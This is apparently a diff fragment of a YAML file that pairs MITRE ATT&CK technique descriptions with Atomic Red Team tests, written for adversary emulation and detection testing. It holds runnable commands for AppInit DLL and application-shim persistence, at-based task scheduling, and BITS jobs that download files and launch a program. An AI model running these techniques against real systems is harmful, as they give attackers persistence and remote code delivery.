+ x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and + look for DLLs that are not recognized or not normally loaded into a process. + Monitor the AppInit_DLLs Registry values for modifications that do not correlate + with known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July + 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system + changes that could be attempts at persistence, including listing current AppInit + DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior + that may be due to a process loading a malicious DLL. Data and events should + not be viewed in isolation, but as part of a chain of behavior that could + lead to other activities, such as making network connections for Command and + Control, learning details about the environment through Discovery, and conducting + Lateral Movement." + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + identifier: T1546.010 + atomic_tests: + - name: Install AppInit Shim + auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 + description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs + to be loaded into each user mode process on the system. Upon succesfully execution, + \nyou will see the message \"The operation completed successfully.\" Each + time the DLL is loaded, you will see a message box with a message of \"Install + AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your + computer starts up various applications and may in fact drive you crazy. A + reliable way to make the message box appear and verify the \nAppInit Dlls + are loading is to start the notepad application. Be sure to run the cleanup + commands afterwards so you don't keep getting message boxes showing up\n" + supported_platforms: + - windows + input_arguments: + registry_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg + registry_cleanup_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg + dependency_executor_name: powershell + dependencies: + - description: 'Reg files must exist on disk at specified locations (#{registry_file} + and #{registry_cleanup_file}) + +' + prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) + {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" + - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and + T1546.010x86.dll) + +' + prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) + {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll + executor: + command: 'reg.exe import #{registry_file} + +' + cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + T1546.011: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.011 + url: https://attack.mitre.org/techniques/T1546/011 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - source_name: FireEye Application Shimming + url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf + description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved + May 4, 2020. + - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf + description: Pierce, Sean. (2015, November). Defending Against Malicious Application + Compatibility Shims. Retrieved June 22, 2017. + source_name: Black Hat 2015 App Shim + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Application Shimming + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by application shims. The Microsoft + Windows Application Compatibility Infrastructure/Framework (Application Shim) + was created to allow for backward compatibility of software as the operating + system codebase changes over time. For example, the application shimming feature + allows developers to apply fixes to applications (without rewriting code) + that were created for Windows XP so that it will work with Windows 10. (Citation: + Elastic Process Injection July 2017)\n\nWithin the framework, shims are created + to act as a buffer between the program (or more specifically, the Import Address + Table) and the Windows OS. When a program is executed, the shim cache is referenced + to determine if the program requires the use of the shim database (.sdb). + If so, the shim database uses hooking to redirect the code as necessary in + order to communicate with the OS. \n\nA list of all shims currently installed + by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom + databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo + keep shims secure, Windows designed them to run in user mode so they cannot + modify the kernel and you must have administrator privileges to install a + shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) + (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data + Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), + and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims + may allow an adversary to perform several malicious acts such as elevate privileges, + install backdoors, disable defenses like Windows Defender, etc. (Citation: + FireEye Application Shimming) Shims can also be abused to establish persistence + by continuously being invoked by affected programs." + id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.094Z' + created: '2020-01-24T14:56:24.231Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): + + * Shim-Process-Scanner - checks memory of every running process for any shim flags + * Shim-Detector-Lite - detects installation of custom shim databases + * Shim-Guard - monitors registry for any shim installations + * ShimScanner - forensic tool to find active shims in memory + * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) + + Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + - 'File: File Modification' + x_mitre_platforms: + - Windows + identifier: T1546.011 + atomic_tests: + - name: Application Shim Installation + auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + description: "Install a shim database. This technique is used for privilege + escalation and bypassing user access control.\nUpon execution, \"Installation + of AtomicShim complete.\" will be displayed. To verify the shim behavior, + run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin + directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" + as defined in the AtomicTest.dll. To better understand what is happening, + review\nthe source code files is the \\\\T1546.011\\\\src + directory.\n" + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the shim database file + type: String + default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: 'Shim database file must exist on disk at specified location + (#{file_path}) + +' + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" + - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll + +' + prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit + 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll + executor: + command: 'sdbinst.exe #{file_path} + +' + cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: New shim database files created in the default shim database directory + auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d + description: | + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb + cleanup_command: | + Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore + Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Registry key creation and/or modification events for SDB + auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + description: | + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing + the registry keys that were created. These keys can also be viewed using the Registry Editor. + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + cleanup_command: | + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + name: powershell + elevation_required: true + T1053.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.001 + url: https://attack.mitre.org/techniques/T1053/001 + - source_name: Kifarunix - Task Scheduling in Linux + url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ + description: Koromicha. (2019, September 7). Scheduling tasks using at command + in Linux. Retrieved December 3, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Linux) + description: |- + Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) + + An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:35:13.112Z' + created: '2019-12-03T12:59:36.749Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_detection: "Monitor scheduled task creation using command-line invocation. + Legitimate scheduled tasks may be created during installation of new software + or through system administration functions. Look for changes to tasks that + do not correlate with known software, patch cycles, etc. \n\nSuspicious program + execution through scheduled tasks may show up as outlier processes that have + not been seen before when compared against historical data. Data and events + should not be viewed in isolation, but as part of a chain of behavior that + could lead to other activities, such as network connections made for Command + and Control, learning details about the environment through Discovery, and + Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + identifier: T1053.001 + atomic_tests: + - name: At - Schedule a job + auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e + description: 'This test submits a command to be run in the future by the `at` + daemon. + +' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: String + default: now + 1 minute + at_command: + description: The command to be run + type: String + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` and `atd` executables must exist in the PATH + +' + prereq_command: 'which at && which atd + +' + get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found + in the PATH (Package name: `at`)'' + +' + - description: 'The `atd` daemon must be running + +' + prereq_command: 'systemctl status atd || service atd status + +' + get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service + atd start` ; systemd: `systemctl start atd`)'' + +' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec} + +' + T1053.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.002 + url: https://attack.mitre.org/techniques/T1053/002 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. + source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Windows) + description: "Adversaries may abuse the at.exe utility to perform + task scheduling for initial or recurring execution of malicious code. The + [at](https://attack.mitre.org/software/S0110) utility exists as an executable + within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) + requires that the Task Scheduler service be running, and the user to be logged + on as a member of the local Administrators group. \n\nAn adversary may use + at.exe in Windows environments to execute programs at system + startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) + can also be abused to conduct remote Execution as part of Lateral Movement + and or to run a process under the context of a specified account (such as + SYSTEM).\n\nNote: The at.exe command line utility has been deprecated + in current versions of Windows in favor of schtasks." + id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T13:43:40.776Z' + created: '2019-11-27T13:52:45.853Z' + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_platforms: + - Windows + identifier: T1053.002 + atomic_tests: + - name: At.exe Scheduled task + auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + description: | + Executes cmd.exe + Note: deprecated in Windows 8+ + + Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: false + command: 'at 13:20 /interactive cmd + +' + T1547.002: + technique: + id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec + description: |- + Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) + + Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. + name: Authentication Package + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.002 + url: https://attack.mitre.org/techniques/T1547/002 + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. + source_name: Microsoft Configure LSA + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:11:25.821Z' + created: '2020-01-24T14:54:42.757Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned DLLs try to load into the LSA by setting + the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1197: + technique: + id: attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: BITS Jobs + description: |- + Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. + + The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) + + Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) + + BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) + external_references: + - source_name: mitre-attack + external_id: T1197 + url: https://attack.mitre.org/techniques/T1197 + - url: https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx + description: Microsoft. (n.d.). Component Object Model (COM). Retrieved November + 22, 2017. + source_name: Microsoft COM + - url: https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx + description: Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved + January 12, 2018. + source_name: Microsoft BITS + - url: https://msdn.microsoft.com/library/aa362813.aspx + description: Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. + source_name: Microsoft BITSAdmin + - url: https://www.secureworks.com/blog/malware-lingers-with-bits + description: Counter Threat Unit Research Team. (2016, June 6). Malware Lingers + with BITS. Retrieved January 12, 2018. + source_name: CTU BITS Malware June 2016 + - url: https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ + description: Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background + Intelligent Transfer Service. Retrieved January 12, 2018. + source_name: Mondok Windows PiggyBack BITS May 2007 + - url: https://www.symantec.com/connect/blogs/malware-update-windows-update + description: Florio, E. (2007, May 9). Malware Update with Windows Update. + Retrieved January 12, 2018. + source_name: Symantec BITS May 2007 + - url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ + description: Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. + Retrieved January 12, 2018. + source_name: PaloAlto UBoatRAT Nov 2017 + - url: https://technet.microsoft.com/library/dd939934.aspx + description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January + 12, 2018. + source_name: Microsoft Issues with BITS July 2011 + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:36:04.956Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_detection: |- + BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS) + + Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016) + + Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS) + x_mitre_defense_bypassed: + - Firewall + - Host forensic analysis + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + - Ricardo Dias + - Red Canary + x_mitre_version: '1.2' + identifier: T1197 + atomic_tests: + - name: Bitsadmin Download (cmd) + auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 + description: | + This test simulates an adversary leveraging bitsadmin.exe to download + and execute a payload + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save downloaded file + type: path + default: "%temp%\\bitsadmin1_flag.ps1" + executor: + command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} + #{local_file} + +' + cleanup_command: 'del #{local_file} >nul 2>&1 + +' + name: command_prompt + - name: Bitsadmin Download (PowerShell) + auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc + description: | + This test simulates an adversary leveraging bitsadmin.exe to download + and execute a payload leveraging PowerShell + + Upon execution you will find a github markdown file downloaded to the Temp directory + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save downloaded file + type: path + default: "$env:TEMP\\bitsadmin2_flag.ps1" + executor: + command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination + #{local_file} + +' + cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore + +' + name: powershell + - name: Persist, Download, & Execute + auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae + description: | + This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. + Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. + This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" + This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. + supported_platforms: + - windows + input_arguments: + command_path: + description: Path of command to execute + type: path + default: C:\Windows\system32\notepad.exe + bits_job_name: + description: Name of BITS job + type: string + default: AtomicBITS + local_file: + description: Local file path to save downloaded file + type: path + default: "%temp%\\bitsadmin3_flag.ps1" + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + executor: + command: | + bitsadmin.exe /create #{bits_job_name} + bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /resume #{bits_job_name} + timeout 5 + bitsadmin.exe /complete #{bits_job_name} + cleanup_command: 'del #{local_file} >nul 2>&1 + +' + name: command_prompt + - name: Bits download using desktopimgdownldr.exe (cmd) + auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 + description: "This test simulates using desktopimgdownldr.exe to download a + malicious file\ninstead of a desktop or lockscreen background img. The process + that actually makes \nthe TCP connection and creates the file on the disk + is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. + See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" + supported_platforms: + - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + download_path: + description: Local file path to save downloaded file + type: path + default: SYSTEMROOT=C:\Windows\Temp + cleanup_path: + description: path to delete file as part of cleanup_command + type: path + default: C:\Windows\Temp\Personalization\LockScreenImage + cleanup_file: + description: file to remove as part of cleanup_command + type: string + default: "*.md" + executor: + command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} + /eventName:desktopimgdownldr + +' + cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 + +' + name: command_prompt + T1547: + technique: + id: 